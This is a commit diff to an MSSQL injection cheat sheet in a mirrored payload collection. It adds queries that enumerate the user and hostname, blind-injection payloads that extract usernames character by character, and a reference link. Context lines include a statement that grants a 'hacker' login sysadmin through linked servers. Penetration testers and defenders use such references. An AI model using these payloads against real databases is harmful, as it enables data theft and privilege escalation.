mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-05 09:17:09 -08:00
DB2 Injection + ADCS
This commit is contained in:
Swissky
@@ -2,9 +2,11 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [MSSQL comments](#mssql-comments)
|
||||
* [MSSQL version](#mssql-version)
|
||||
* [MSSQL database name](#mssql-database-name)
|
||||
* [MSSQL Comments](#mssql-comments)
|
||||
* [MSSQL User](#mssql-user)
|
||||
* [MSSQL Version](#mssql-version)
|
||||
* [MSSQL Hostname](#mssql-hostname)
|
||||
* [MSSQL Database name](#mssql-database-name)
|
||||
* [MSSQL List databases](#mssql-list-databases)
|
||||
* [MSSQL List columns](#mssql-list-columns)
|
||||
* [MSSQL List tables](#mssql-list-tables)
|
||||
@@ -22,7 +24,7 @@
|
||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||
* [MSSQL Trusted Links](#mssql-trusted-links)
|
||||
|
||||
## MSSQL comments
|
||||
## MSSQL Comments
|
||||
|
||||
```sql
|
||||
-- comment goes here
|
||||
@@ -33,6 +35,9 @@
|
||||
|
||||
```sql
|
||||
SELECT CURRENT_USER
|
||||
SELECT user_name();
|
||||
SELECT system_user;
|
||||
SELECT user;
|
||||
```
|
||||
|
||||
## MSSQL version
|
||||
@@ -41,7 +46,14 @@ SELECT CURRENT_USER
|
||||
SELECT @@version
|
||||
```
|
||||
|
||||
## MSSQL database name
|
||||
## MSSQL Hostname
|
||||
|
||||
```sql
|
||||
SELECT HOST_NAME()
|
||||
SELECT @@hostname;
|
||||
```
|
||||
|
||||
## MSSQL Database name
|
||||
|
||||
```sql
|
||||
SELECT DB_NAME()
|
||||
@@ -122,6 +134,13 @@ For string inputs : ' + cast((SELECT @@version) as int) + '
|
||||
## MSSQL Blind based
|
||||
|
||||
```sql
|
||||
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
|
||||
|
||||
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
|
||||
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
|
||||
|
||||
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
|
||||
|
||||
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
|
||||
|
||||
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
|
||||
@@ -283,4 +302,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
|
||||
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
|
||||
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
|
||||
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
|
||||
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
|
||||
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
|
||||
* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975)
|
||||
Reference in New Issue
Block a user